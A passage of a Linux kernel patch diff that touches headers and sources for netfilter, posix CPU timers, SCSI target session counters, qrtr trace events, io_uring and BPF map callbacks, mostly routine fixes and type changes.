+ 	const u64 action_mask = XDP_ABORTED | XDP_DROP | XDP_PASS | XDP_TX;
+diff --git a/include/linux/mailbox/zynqmp-ipi-message.h b/include/linux/mailbox/zynqmp-ipi-message.h
+index 35ce84c8ca02c..31d8046d945e7 100644
+--- a/include/linux/mailbox/zynqmp-ipi-message.h
++++ b/include/linux/mailbox/zynqmp-ipi-message.h
+@@ -9,7 +9,7 @@
+  * @data: message payload
+  *
+  * This is the structure for data used in mbox_send_message
+- * the maximum length of data buffer is fixed to 12 bytes.
++ * the maximum length of data buffer is fixed to 32 bytes.
+  * Client is supposed to be aware of this.
+  */
+ struct zynqmp_ipi_message {
+diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h
+index a9ee7bc59c901..90ab0e31ecf46 100644
+--- a/include/linux/mlx5/mlx5_ifc.h
++++ b/include/linux/mlx5/mlx5_ifc.h
+@@ -9144,7 +9144,8 @@ struct mlx5_ifc_alloc_flow_counter_in_bits {
+ 	u8         reserved_at_20[0x10];
+ 	u8         op_mod[0x10];
+ 
+-	u8         reserved_at_40[0x38];
++	u8         reserved_at_40[0x33];
++	u8         flow_counter_bulk_log_size[0x5];
+ 	u8         flow_counter_bulk[0x8];
+ };
+ 
+diff --git a/include/linux/netfilter/nfnetlink.h b/include/linux/netfilter/nfnetlink.h
+index 241e005f290ad..e9a9ab34a7ccc 100644
+--- a/include/linux/netfilter/nfnetlink.h
++++ b/include/linux/netfilter/nfnetlink.h
+@@ -45,7 +45,6 @@ struct nfnetlink_subsystem {
+ 	int (*commit)(struct net *net, struct sk_buff *skb);
+ 	int (*abort)(struct net *net, struct sk_buff *skb,
+ 		     enum nfnl_abort_action action);
+-	void (*cleanup)(struct net *net);
+ 	bool (*valid_genid)(struct net *net, u32 genid);
+ };
+ 
+diff --git a/include/linux/platform_device.h b/include/linux/platform_device.h
+index b0d5a253156ec..b845fd83f429b 100644
+--- a/include/linux/platform_device.h
++++ b/include/linux/platform_device.h
+@@ -207,7 +207,18 @@ extern void platform_device_put(struct platform_device *pdev);
+ 
+ struct platform_driver {
+ 	int (*probe)(struct platform_device *);
++
++	/*
++	 * Traditionally the remove callback returned an int which however is
++	 * ignored by the driver core. This led to wrong expectations by driver
++	 * authors who thought returning an error code was a valid error
++	 * handling strategy. To convert to a callback returning void, new
++	 * drivers should implement .remove_new() until the conversion it done
++	 * that eventually makes .remove() return void.
++	 */
+ 	int (*remove)(struct platform_device *);
++	void (*remove_new)(struct platform_device *);
++
+ 	void (*shutdown)(struct platform_device *);
+ 	int (*suspend)(struct platform_device *, pm_message_t state);
+ 	int (*resume)(struct platform_device *);
+diff --git a/include/linux/posix-timers.h b/include/linux/posix-timers.h
+index 2c6e99ca48afc..d607f51404fca 100644
+--- a/include/linux/posix-timers.h
++++ b/include/linux/posix-timers.h
+@@ -4,6 +4,7 @@
+ 
+ #include <linux/spinlock.h>
+ #include <linux/list.h>
++#include <linux/mutex.h>
+ #include <linux/alarmtimer.h>
+ #include <linux/timerqueue.h>
+ 
+@@ -62,16 +63,18 @@ static inline int clockid_to_fd(const clockid_t clk)
+  * cpu_timer - Posix CPU timer representation for k_itimer
+  * @node:	timerqueue node to queue in the task/sig
+  * @head:	timerqueue head on which this timer is queued
+- * @task:	Pointer to target task
++ * @pid:	Pointer to target task PID
+  * @elist:	List head for the expiry list
+  * @firing:	Timer is currently firing
++ * @handling:	Pointer to the task which handles expiry
+  */
+ struct cpu_timer {
+-	struct timerqueue_node	node;
+-	struct timerqueue_head	*head;
+-	struct pid		*pid;
+-	struct list_head	elist;
+-	int			firing;
++	struct timerqueue_node		node;
++	struct timerqueue_head		*head;
++	struct pid			*pid;
++	struct list_head		elist;
++	int				firing;
++	struct task_struct __rcu	*handling;
+ };
+ 
+ static inline bool cpu_timer_enqueue(struct timerqueue_head *head,
+@@ -135,10 +138,12 @@ struct posix_cputimers {
+ /**
+  * posix_cputimers_work - Container for task work based posix CPU timer expiry
+  * @work:	The task work to be scheduled
++ * @mutex:	Mutex held around expiry in context of this task work
+  * @scheduled:  @work has been scheduled already, no further processing
+  */
+ struct posix_cputimers_work {
+ 	struct callback_head	work;
++	struct mutex		mutex;
+ 	unsigned int		scheduled;
+ };
+ 
+diff --git a/include/linux/sunrpc/sched.h b/include/linux/sunrpc/sched.h
+index b8ca3ecaf8d76..8ada7dc802d30 100644
+--- a/include/linux/sunrpc/sched.h
++++ b/include/linux/sunrpc/sched.h
+@@ -90,8 +90,7 @@ struct rpc_task {
+ #endif
+ 	unsigned char		tk_priority : 2,/* Task priority */
+ 				tk_garb_retry : 2,
+-				tk_cred_retry : 2,
+-				tk_rebind_retry : 2;
++				tk_cred_retry : 2;
+ };
+ 
+ typedef void			(*rpc_action)(struct rpc_task *);
+diff --git a/include/linux/tick.h b/include/linux/tick.h
+index bfd571f18cfdc..9459fef5b8573 100644
+--- a/include/linux/tick.h
++++ b/include/linux/tick.h
+@@ -216,6 +216,7 @@ extern void tick_nohz_dep_set_signal(struct task_struct *tsk,
+ 				     enum tick_dep_bits bit);
+ extern void tick_nohz_dep_clear_signal(struct signal_struct *signal,
+ 				       enum tick_dep_bits bit);
++extern bool tick_nohz_cpu_hotpluggable(unsigned int cpu);
+ 
+ /*
+  * The below are tick_nohz_[set,clear]_dep() wrappers that optimize off-cases
+@@ -280,6 +281,7 @@ static inline void tick_nohz_full_add_cpus_to(struct cpumask *mask) { }
+ 
+ static inline void tick_nohz_dep_set_cpu(int cpu, enum tick_dep_bits bit) { }
+ static inline void tick_nohz_dep_clear_cpu(int cpu, enum tick_dep_bits bit) { }
++static inline bool tick_nohz_cpu_hotpluggable(unsigned int cpu) { return true; }
+ 
+ static inline void tick_dep_set(enum tick_dep_bits bit) { }
+ static inline void tick_dep_clear(enum tick_dep_bits bit) { }
+diff --git a/include/linux/vt_buffer.h b/include/linux/vt_buffer.h
+index 848db1b1569ff..919d999a8c1db 100644
+--- a/include/linux/vt_buffer.h
++++ b/include/linux/vt_buffer.h
+@@ -16,7 +16,7 @@
+ 
+ #include <linux/string.h>
+ 
+-#if defined(CONFIG_VGA_CONSOLE) || defined(CONFIG_MDA_CONSOLE)
++#if IS_ENABLED(CONFIG_VGA_CONSOLE) || IS_ENABLED(CONFIG_MDA_CONSOLE)
+ #include <asm/vga.h>
+ #endif
+ 
+diff --git a/include/net/netfilter/nf_conntrack_core.h b/include/net/netfilter/nf_conntrack_core.h
+index 71d1269fe4d4f..3384859a89210 100644
+--- a/include/net/netfilter/nf_conntrack_core.h
++++ b/include/net/netfilter/nf_conntrack_core.h
+@@ -89,7 +89,11 @@ static inline void __nf_ct_set_timeout(struct nf_conn *ct, u64 timeout)
+ {
+ 	if (timeout > INT_MAX)
+ 		timeout = INT_MAX;
+-	WRITE_ONCE(ct->timeout, nfct_time_stamp + (u32)timeout);
++
++	if (nf_ct_is_confirmed(ct))
++		WRITE_ONCE(ct->timeout, nfct_time_stamp + (u32)timeout);
++	else
++		ct->timeout = (u32)timeout;
+ }
+ 
+ int __nf_ct_change_timeout(struct nf_conn *ct, u64 cta_timeout);
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 1b8e305bb54ae..9dace9bcba8e5 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -619,6 +619,7 @@ struct nft_set_binding {
+ };
+ 
+ enum nft_trans_phase;
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase);
+diff --git a/include/net/scm.h b/include/net/scm.h
+index 1ce365f4c2560..585adc1346bd0 100644
+--- a/include/net/scm.h
++++ b/include/net/scm.h
+@@ -105,16 +105,27 @@ static inline void scm_passec(struct socket *sock, struct msghdr *msg, struct sc
+ 		}
+ 	}
+ }
++
++static inline bool scm_has_secdata(struct socket *sock)
++{
++	return test_bit(SOCK_PASSSEC, &sock->flags);
++}
+ #else
+ static inline void scm_passec(struct socket *sock, struct msghdr *msg, struct scm_cookie *scm)
+ { }
++
++static inline bool scm_has_secdata(struct socket *sock)
++{
++	return false;
++}
+ #endif /* CONFIG_SECURITY_NETWORK */
+ 
+ static __inline__ void scm_recv(struct socket *sock, struct msghdr *msg,
+ 				struct scm_cookie *scm, int flags)
+ {
+ 	if (!msg->msg_control) {
+-		if (test_bit(SOCK_PASSCRED, &sock->flags) || scm->fp)
++		if (test_bit(SOCK_PASSCRED, &sock->flags) || scm->fp ||
++		    scm_has_secdata(sock))
+ 			msg->msg_flags |= MSG_CTRUNC;
+ 		scm_destroy(scm);
+ 		return;
+diff --git a/include/net/xsk_buff_pool.h b/include/net/xsk_buff_pool.h
+index f787c3f524b03..996eaf1ef1a1d 100644
+--- a/include/net/xsk_buff_pool.h
++++ b/include/net/xsk_buff_pool.h
+@@ -175,13 +175,8 @@ static inline bool xp_desc_crosses_non_contig_pg(struct xsk_buff_pool *pool,
+ 	if (likely(!cross_pg))
+ 		return false;
+ 
+-	if (pool->dma_pages_cnt) {
+-		return !(pool->dma_pages[addr >> PAGE_SHIFT] &
+-			 XSK_NEXT_PG_CONTIG_MASK);
+-	}
+-
+-	/* skb path */
+-	return addr + len > pool->addrs_cnt;
++	return pool->dma_pages_cnt &&
++	       !(pool->dma_pages[addr >> PAGE_SHIFT] & XSK_NEXT_PG_CONTIG_MASK);
+ }
+ 
+ static inline u64 xp_aligned_extract_addr(struct xsk_buff_pool *pool, u64 addr)
+diff --git a/include/target/iscsi/iscsi_target_core.h b/include/target/iscsi/iscsi_target_core.h
+index 94d06ddfd80ad..229118156a1f6 100644
+--- a/include/target/iscsi/iscsi_target_core.h
++++ b/include/target/iscsi/iscsi_target_core.h
+@@ -600,6 +600,7 @@ struct iscsit_conn {
+ 	struct iscsi_tpg_np	*tpg_np;
+ 	/* Pointer to parent session */
+ 	struct iscsit_session	*sess;
++	struct target_cmd_counter *cmd_cnt;
+ 	int			bitmap_id;
+ 	int			rx_thread_active;
+ 	struct task_struct	*rx_thread;
+diff --git a/include/target/target_core_base.h b/include/target/target_core_base.h
+index 12c9ba16217ef..8cc42ad65c925 100644
+--- a/include/target/target_core_base.h
++++ b/include/target/target_core_base.h
+@@ -494,6 +494,7 @@ struct se_cmd {
+ 	struct se_lun		*se_lun;
+ 	/* Only used for internal passthrough and legacy TCM fabric modules */
+ 	struct se_session	*se_sess;
++	struct target_cmd_counter *cmd_cnt;
+ 	struct se_tmr_req	*se_tmr_req;
+ 	struct llist_node	se_cmd_list;
+ 	struct completion	*free_compl;
+@@ -619,22 +620,26 @@ static inline struct se_node_acl *fabric_stat_to_nacl(struct config_item *item)
+ 			acl_fabric_stat_group);
+ }
+ 
+-struct se_session {
++struct target_cmd_counter {
++	struct percpu_ref	refcnt;
++	wait_queue_head_t	refcnt_wq;
++	struct completion	stop_done;
+ 	atomic_t		stopped;
++};
++
++struct se_session {
+ 	u64			sess_bin_isid;
+ 	enum target_prot_op	sup_prot_ops;
+ 	enum target_prot_type	sess_prot_type;
+ 	struct se_node_acl	*se_node_acl;
+ 	struct se_portal_group *se_tpg;
+ 	void			*fabric_sess_ptr;
+-	struct percpu_ref	cmd_count;
+ 	struct list_head	sess_list;
+ 	struct list_head	sess_acl_list;
+ 	spinlock_t		sess_cmd_lock;
+-	wait_queue_head_t	cmd_count_wq;
+-	struct completion	stop_done;
+ 	void			*sess_cmd_map;
+ 	struct sbitmap_queue	sess_tag_pool;
++	struct target_cmd_counter *cmd_cnt;
+ };
+ 
+ struct se_device;
+@@ -867,6 +872,7 @@ struct se_device {
+ 	struct rcu_head		rcu_head;
+ 	int			queue_cnt;
+ 	struct se_device_queue	*queues;
++	struct mutex		lun_reset_mutex;
+ };
+ 
+ struct target_opcode_descriptor {
+diff --git a/include/target/target_core_fabric.h b/include/target/target_core_fabric.h
+index 38f0662476d14..b188b1e90e1ed 100644
+--- a/include/target/target_core_fabric.h
++++ b/include/target/target_core_fabric.h
+@@ -133,7 +133,12 @@ struct se_session *target_setup_session(struct se_portal_group *,
+ 				struct se_session *, void *));
+ void target_remove_session(struct se_session *);
+ 
+-int transport_init_session(struct se_session *se_sess);
++void target_stop_cmd_counter(struct target_cmd_counter *cmd_cnt);
++void target_wait_for_cmds(struct target_cmd_counter *cmd_cnt);
++struct target_cmd_counter *target_alloc_cmd_counter(void);
++void target_free_cmd_counter(struct target_cmd_counter *cmd_cnt);
++
++void transport_init_session(struct se_session *se_sess);
+ struct se_session *transport_alloc_session(enum target_prot_op);
+ int transport_alloc_session_tags(struct se_session *, unsigned int,
+ 		unsigned int);
+@@ -149,9 +154,11 @@ void	transport_deregister_session_configfs(struct se_session *);
+ void	transport_deregister_session(struct se_session *);
+ 
+ 
+-void	__target_init_cmd(struct se_cmd *,
+-		const struct target_core_fabric_ops *,
+-		struct se_session *, u32, int, int, unsigned char *, u64);
++void	__target_init_cmd(struct se_cmd *cmd,
++		const struct target_core_fabric_ops *tfo,
++		struct se_session *sess, u32 data_length, int data_direction,
++		int task_attr, unsigned char *sense_buffer, u64 unpacked_lun,
++		struct target_cmd_counter *cmd_cnt);
+ int	target_init_cmd(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 		unsigned char *sense, u64 unpacked_lun, u32 data_length,
+ 		int task_attr, int data_dir, int flags);
+diff --git a/include/trace/events/qrtr.h b/include/trace/events/qrtr.h
+index b1de14c3bb934..441132c67133f 100644
+--- a/include/trace/events/qrtr.h
++++ b/include/trace/events/qrtr.h
+@@ -10,15 +10,16 @@
+ 
+ TRACE_EVENT(qrtr_ns_service_announce_new,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -36,15 +37,16 @@ TRACE_EVENT(qrtr_ns_service_announce_new,
+ 
+ TRACE_EVENT(qrtr_ns_service_announce_del,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -62,15 +64,16 @@ TRACE_EVENT(qrtr_ns_service_announce_del,
+ 
+ TRACE_EVENT(qrtr_ns_server_add,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
+diff --git a/include/trace/events/timer.h b/include/trace/events/timer.h
+index 2e713a7d9aa3a..3e8619c72f774 100644
+--- a/include/trace/events/timer.h
++++ b/include/trace/events/timer.h
+@@ -371,7 +371,8 @@ TRACE_EVENT(itimer_expire,
+ 		tick_dep_name(PERF_EVENTS)		\
+ 		tick_dep_name(SCHED)			\
+ 		tick_dep_name(CLOCK_UNSTABLE)		\
+-		tick_dep_name_end(RCU)
++		tick_dep_name(RCU)			\
++		tick_dep_name_end(RCU_EXP)
+ 
+ #undef tick_dep_name
+ #undef tick_dep_mask_name
+diff --git a/include/trace/stages/stage5_get_offsets.h b/include/trace/stages/stage5_get_offsets.h
+index ac5c24d3beeb2..e30a13be46ba5 100644
+--- a/include/trace/stages/stage5_get_offsets.h
++++ b/include/trace/stages/stage5_get_offsets.h
+@@ -9,17 +9,30 @@
+ #undef __entry
+ #define __entry entry
+ 
++/*
++ * Fields should never declare an array: i.e. __field(int, arr[5])
++ * If they do, it will cause issues in parsing and possibly corrupt the
++ * events. To prevent that from happening, test the sizeof() a fictitious
++ * type called "struct _test_no_array_##item" which will fail if "item"
++ * contains array elements (like "arr[5]").
++ *
++ * If you hit this, use __array(int, arr, 5) instead.
++ */
+ #undef __field
+-#define __field(type, item)
++#define __field(type, item)					\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_ext
+-#define __field_ext(type, item, filter_type)
++#define __field_ext(type, item, filter_type)			\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_struct
+-#define __field_struct(type, item)
++#define __field_struct(type, item)				\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_struct_ext
+-#define __field_struct_ext(type, item, filter_type)
++#define __field_struct_ext(type, item, filter_type)		\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __array
+ #define __array(type, item, len)
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index 464ca3f01fe7a..bd260134c4201 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -6901,6 +6901,17 @@ struct bpf_list_node {
+ 	__u64 :64;
+ } __attribute__((aligned(8)));
+ 
++struct bpf_rb_root {
++	__u64 :64;
++	__u64 :64;
++} __attribute__((aligned(8)));
++
++struct bpf_rb_node {
++	__u64 :64;
++	__u64 :64;
++	__u64 :64;
++} __attribute__((aligned(8)));
++
+ struct bpf_sysctl {
+ 	__u32	write;		/* Sysctl is being read (= 0) or written (= 1).
+ 				 * Allows 1,2,4-byte read, but no write.
+diff --git a/include/uapi/linux/btrfs.h b/include/uapi/linux/btrfs.h
+index b4f0f9531119f..5864d2d9b79a3 100644
+--- a/include/uapi/linux/btrfs.h
++++ b/include/uapi/linux/btrfs.h
+@@ -187,6 +187,7 @@ struct btrfs_scrub_progress {
+ };
+ 
+ #define BTRFS_SCRUB_READONLY	1
++#define BTRFS_SCRUB_SUPPORTED_FLAGS	(BTRFS_SCRUB_READONLY)
+ struct btrfs_ioctl_scrub_args {
+ 	__u64 devid;				/* in */
+ 	__u64 start;				/* in */
+diff --git a/include/uapi/linux/const.h b/include/uapi/linux/const.h
+index af2a44c08683d..a429381e7ca50 100644
+--- a/include/uapi/linux/const.h
++++ b/include/uapi/linux/const.h
+@@ -28,7 +28,7 @@
+ #define _BITUL(x)	(_UL(1) << (x))
+ #define _BITULL(x)	(_ULL(1) << (x))
+ 
+-#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)
++#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (__typeof__(x))(a) - 1)
+ #define __ALIGN_KERNEL_MASK(x, mask)	(((x) + (mask)) & ~(mask))
+ 
+ #define __KERNEL_DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))
+diff --git a/include/xen/xen.h b/include/xen/xen.h
+index 7adf59837c258..0efeb652f9b8f 100644
+--- a/include/xen/xen.h
++++ b/include/xen/xen.h
+@@ -71,4 +71,15 @@ static inline void xen_free_unpopulated_pages(unsigned int nr_pages,
+ }
+ #endif
+ 
++#if defined(CONFIG_XEN_DOM0) && defined(CONFIG_ACPI) && defined(CONFIG_X86)
++bool __init xen_processor_present(uint32_t acpi_id);
++#else
++#include <linux/bug.h>
++static inline bool xen_processor_present(uint32_t acpi_id)
++{
++	BUG();
++	return false;
++}
++#endif
++
+ #endif	/* _XEN_XEN_H */
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 4ccfc29216269..e100f040371b5 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -577,7 +577,7 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
+ 		}
+ 
+ 		ctx->user_bufs[i] = imu;
+-		*io_get_tag_slot(ctx->buf_data, offset) = tag;
++		*io_get_tag_slot(ctx->buf_data, i) = tag;
+ 	}
+ 
+ 	if (needs_switch)
+diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c
+index 4847069595569..cb80bcc880b44 100644
+--- a/kernel/bpf/arraymap.c
++++ b/kernel/bpf/arraymap.c
+@@ -307,8 +307,8 @@ static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int array_map_update_elem(struct bpf_map *map, void *key, void *value,
+-				 u64 map_flags)
++static long array_map_update_elem(struct bpf_map *map, void *key, void *value,
++				  u64 map_flags)
+ {
+ 	struct bpf_array *array = container_of(map, struct bpf_array, map);
+ 	u32 index = *(u32 *)key;
+@@ -386,7 +386,7 @@ int bpf_percpu_array_update(struct bpf_map *map, void *key, void *value,
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int array_map_delete_elem(struct bpf_map *map, void *key)
++static long array_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	return -EINVAL;
+ }
+@@ -686,8 +686,8 @@ static const struct bpf_iter_seq_info iter_seq_info = {
+ 	.seq_priv_size		= sizeof(struct bpf_iter_seq_array_map_info),
+ };
+ 
+-static int bpf_for_each_array_elem(struct bpf_map *map, bpf_callback_t callback_fn,
+-				   void *callback_ctx, u64 flags)
++static long bpf_for_each_array_elem(struct bpf_map *map, bpf_callback_t callback_fn,
++				    void *callback_ctx, u64 flags)
+ {
+ 	u32 i, key, num_elems = 0;
+ 	struct bpf_array *array;
+@@ -847,7 +847,7 @@ int bpf_fd_array_map_update_elem(struct bpf_map *map, struct file *map_file,
+ 	return 0;
+ }
+ 
+-static int fd_array_map_delete_elem(struct bpf_map *map, void *key)
++static long fd_array_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_array *array = container_of(map, struct bpf_array, map);
+ 	void *old_ptr;
+diff --git a/kernel/bpf/bloom_filter.c b/kernel/bpf/bloom_filter.c
+index 48ee750849f25..b386a8fdf28cc 100644
+--- a/kernel/bpf/bloom_filter.c
++++ b/kernel/bpf/bloom_filter.c
+@@ -41,7 +41,7 @@ static u32 hash(struct bpf_bloom_filter *bloom, void *value,
+ 	return h & bloom->bitset_mask;
+ }
+ 
+-static int bloom_map_peek_elem(struct bpf_map *map, void *value)
++static long bloom_map_peek_elem(struct bpf_map *map, void *value)
+ {
+ 	struct bpf_bloom_filter *bloom =
+ 		container_of(map, struct bpf_bloom_filter, map);
+@@ -56,7 +56,7 @@ static int bloom_map_peek_elem(struct bpf_map *map, void *value)
+ 	return 0;
+ }
+ 
+-static int bloom_map_push_elem(struct bpf_map *map, void *value, u64 flags)
++static long bloom_map_push_elem(struct bpf_map *map, void *value, u64 flags)
+ {
+ 	struct bpf_bloom_filter *bloom =
+ 		container_of(map, struct bpf_bloom_filter, map);
+@@ -73,12 +73,12 @@ static int bloom_map_push_elem(struct bpf_map *map, void *value, u64 flags)
+ 	return 0;
+ }
+ 
+-static int bloom_map_pop_elem(struct bpf_map *map, void *value)
++static long bloom_map_pop_elem(struct bpf_map *map, void *value)
+ {
+ 	return -EOPNOTSUPP;
+ }
+ 
+-static int bloom_map_delete_elem(struct bpf_map *map, void *value)
++static long bloom_map_delete_elem(struct bpf_map *map, void *value)
+ {
+ 	return -EOPNOTSUPP;
+ }
+@@ -177,8 +177,8 @@ static void *bloom_map_lookup_elem(struct bpf_map *map, void *key)
+ 	return ERR_PTR(-EINVAL);
+ }
+ 
+-static int bloom_map_update_elem(struct bpf_map *map, void *key,
+-				 void *value, u64 flags)
++static long bloom_map_update_elem(struct bpf_map *map, void *key,
++				  void *value, u64 flags)
+ {
+ 	/* The eBPF program should use map_push_elem instead */
+ 	return -EINVAL;
+diff --git a/kernel/bpf/bpf_cgrp_storage.c b/kernel/bpf/bpf_cgrp_storage.c
+index 6cdf6d9ed91df..d4a074247b64d 100644
+--- a/kernel/bpf/bpf_cgrp_storage.c
++++ b/kernel/bpf/bpf_cgrp_storage.c
+@@ -100,8 +100,8 @@ static void *bpf_cgrp_storage_lookup_elem(struct bpf_map *map, void *key)
+ 	return sdata ? sdata->data : NULL;
+ }
+ 
+-static int bpf_cgrp_storage_update_elem(struct bpf_map *map, void *key,
+-					  void *value, u64 map_flags)
++static long bpf_cgrp_storage_update_elem(struct bpf_map *map, void *key,
++					 void *value, u64 map_flags)
+ {
+ 	struct bpf_local_storage_data *sdata;
+ 	struct cgroup *cgroup;
+@@ -132,7 +132,7 @@ static int cgroup_storage_delete(struct cgroup *cgroup, struct bpf_map *map)
+ 	return 0;
+ }
+ 
+-static int bpf_cgrp_storage_delete_elem(struct bpf_map *map, void *key)
++static long bpf_cgrp_storage_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct cgroup *cgroup;
+ 	int err, fd;
+diff --git a/kernel/bpf/bpf_inode_storage.c b/kernel/bpf/bpf_inode_storage.c
+index 05f4c66c9089f..a8afc656808b2 100644
+--- a/kernel/bpf/bpf_inode_storage.c
++++ b/kernel/bpf/bpf_inode_storage.c
+@@ -97,8 +97,8 @@ static void *bpf_fd_inode_storage_lookup_elem(struct bpf_map *map, void *key)
+ 	return sdata ? sdata->data : NULL;
+ }
+ 
+-static int bpf_fd_inode_storage_update_elem(struct bpf_map *map, void *key,
+-					 void *value, u64 map_flags)
++static long bpf_fd_inode_storage_update_elem(struct bpf_map *map, void *key,
++					     void *value, u64 map_flags)
+ {
+ 	struct bpf_local_storage_data *sdata;
+ 	struct file *f;
+@@ -133,7 +133,7 @@ static int inode_storage_delete(struct inode *inode, struct bpf_map *map)
+ 	return 0;
+ }
+ 
+-static int bpf_fd_inode_storage_delete_elem(struct bpf_map *map, void *key)
++static long bpf_fd_inode_storage_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct file *f;
+ 	int fd, err;
+diff --git a/kernel/bpf/bpf_struct_ops.c b/kernel/bpf/bpf_struct_ops.c
+index ece9870cab68e..36c17271d38bd 100644
+--- a/kernel/bpf/bpf_struct_ops.c
++++ b/kernel/bpf/bpf_struct_ops.c
+@@ -349,8 +349,8 @@ int bpf_struct_ops_prepare_trampoline(struct bpf_tramp_links *tlinks,
+ 					   model, flags, tlinks, NULL);
+ }
+ 
+-static int bpf_struct_ops_map_update_elem(struct bpf_map *map, void *key,
+-					  void *value, u64 flags)
++static long bpf_struct_ops_map_update_elem(struct bpf_map *map, void *key,
++					   void *value, u64 flags)
+ {
+ 	struct bpf_struct_ops_map *st_map = (struct bpf_struct_ops_map *)map;
+ 	const struct bpf_struct_ops *st_ops = st_map->st_ops;
+@@ -524,7 +524,7 @@ unlock:
+ 	return err;
+ }
+ 
+-static int bpf_struct_ops_map_delete_elem(struct bpf_map *map, void *key)
++static long bpf_struct_ops_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	enum bpf_struct_ops_state prev_state;
+ 	struct bpf_struct_ops_map *st_map;
+diff --git a/kernel/bpf/bpf_task_storage.c b/kernel/bpf/bpf_task_storage.c
+index 1e486055a523d..b29f0bf28fd15 100644
+--- a/kernel/bpf/bpf_task_storage.c
++++ b/kernel/bpf/bpf_task_storage.c
+@@ -127,8 +127,8 @@ out:
+ 	return ERR_PTR(err);
+ }
+ 
+-static int bpf_pid_task_storage_update_elem(struct bpf_map *map, void *key,
+-					    void *value, u64 map_flags)
++static long bpf_pid_task_storage_update_elem(struct bpf_map *map, void *key,
++					     void *value, u64 map_flags)
+ {
+ 	struct bpf_local_storage_data *sdata;
+ 	struct task_struct *task;
+@@ -180,7 +180,7 @@ static int task_storage_delete(struct task_struct *task, struct bpf_map *map,
+ 	return 0;
+ }
+ 
+-static int bpf_pid_task_storage_delete_elem(struct bpf_map *map, void *key)
++static long bpf_pid_task_storage_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct task_struct *task;
+ 	unsigned int f_flags;
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 9880faa7e6760..6f3326417f27e 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -566,8 +566,8 @@ static s32 bpf_find_btf_id(const char *name, u32 kind, struct btf **btf_p)
+ 			*btf_p = btf;
+ 			return ret;
+ 		}
+-		spin_lock_bh(&btf_idr_lock);
+ 		btf_put(btf);
++		spin_lock_bh(&btf_idr_lock);
+ 	}
+ 	spin_unlock_bh(&btf_idr_lock);
+ 	return ret;
+@@ -3228,7 +3228,7 @@ struct btf_field_info {
+ 		struct {
+ 			const char *node_name;
+ 			u32 value_btf_id;
+-		} list_head;
++		} graph_root;
+ 	};
+ };
+ 
+@@ -3305,12 +3305,14 @@ static const char *btf_find_decl_tag_value(const struct btf *btf,
+ 	return NULL;
+ }
+ 
+-static int btf_find_list_head(const struct btf *btf, const struct btf_type *pt,
+-			      const struct btf_type *t, int comp_idx,
+-			      u32 off, int sz, struct btf_field_info *info)
++static int
++btf_find_graph_root(const struct btf *btf, const struct btf_type *pt,
++		    const struct btf_type *t, int comp_idx, u32 off,
++		    int sz, struct btf_field_info *info,
++		    enum btf_field_type head_type)
+ {
++	const char *node_field_name;
+ 	const char *value_type;
+-	const char *list_node;
+ 	s32 id;
+ 
+ 	if (!__btf_type_is_struct(t))
